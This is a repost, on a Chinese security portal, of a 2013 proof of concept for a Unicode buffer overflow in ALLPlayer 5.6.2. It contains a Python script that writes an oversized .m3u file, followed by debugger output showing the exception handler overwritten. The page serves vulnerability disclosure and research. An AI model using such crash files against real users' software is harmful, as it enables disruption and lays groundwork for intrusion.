首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ALLPlayer 5.6.2 (.m3u) - Local Buffer Overflow PoC
来源:metacom27 at gmail.com 作者:metacom 发布时间:2013-10-11  
Title: ALLPlayer Local Buffer Overflow PoC UNICODE 
Vendor: http://www.allplayer.org/download/allplayer
Date found:     09.10.2013
Date published: 09.10.2013
Platform: windows 7 German
Bug: Buffer Overflow UNICODE
----------------------------
   
1)VERSIONS AFFECTED
----
ALLPlayer 5.6.2
  
2)Proof of Concept
------------------
   
junk = "http://"
  
buffer="\x41" * 5000
  
exploit = junk + buffer 
  
try:
    out_file = open("ALLPlayer_Poc.m3u",'w')
    out_file.write(exploit)
    out_file.close()
    print "Exploit file created!" 
except:
    print "Error"
  
3)-(DEBUG)
----------
(1e60.1dec): Access violation - code c0000005 (!!! second chance !!!)
*** WARNING: Unable to verify checksum for C:\Program Files\ALLPlayer\ALLPlayer.exe
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\ALLPlayer\ALLPlayer.exe
eax=00000000 ebx=00000000 ecx=00410041 edx=770d720d esi=00000000 edi=00000000
eip=00410041 esp=000311c4 ebp=000311e4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00210246
ALLPlayer+0x10041:
00410041 008bc0ff2504    add     byte ptr [ebx+425FFC0h],cl ds:0023:0425ffc0=??
0:000> !exchain
---------------
0012e4b0: ALLPlayer+1b7037 (005b7037)
0012e734: ALLPlayer+10041 (00410041)
Invalid exception stack at 00410041
  
4)Credits
---------
metacom
Contact : metacom27 at gmail.com

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Internet Haut Debit Mobile Buf
·ONO Hitron CDE-30364 Router -
·davfs2 1.4.6/1.4.7 - Local Pri
·Indusoft Thin Client 7.1 Activ
·Abuse HTTP Server 2.8 Denial O
·VMware Hyperic HQ Groovy Scrip
·PinApp Mail-SeCure Access Cont
·Beetel Connection Manager SEH
·Firefox For Android Same-Origi
·Android Zygote Socket Vulnerab
·Microsoft Internet Explorer Se
·MS13-080 Microsoft Internet Ex
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved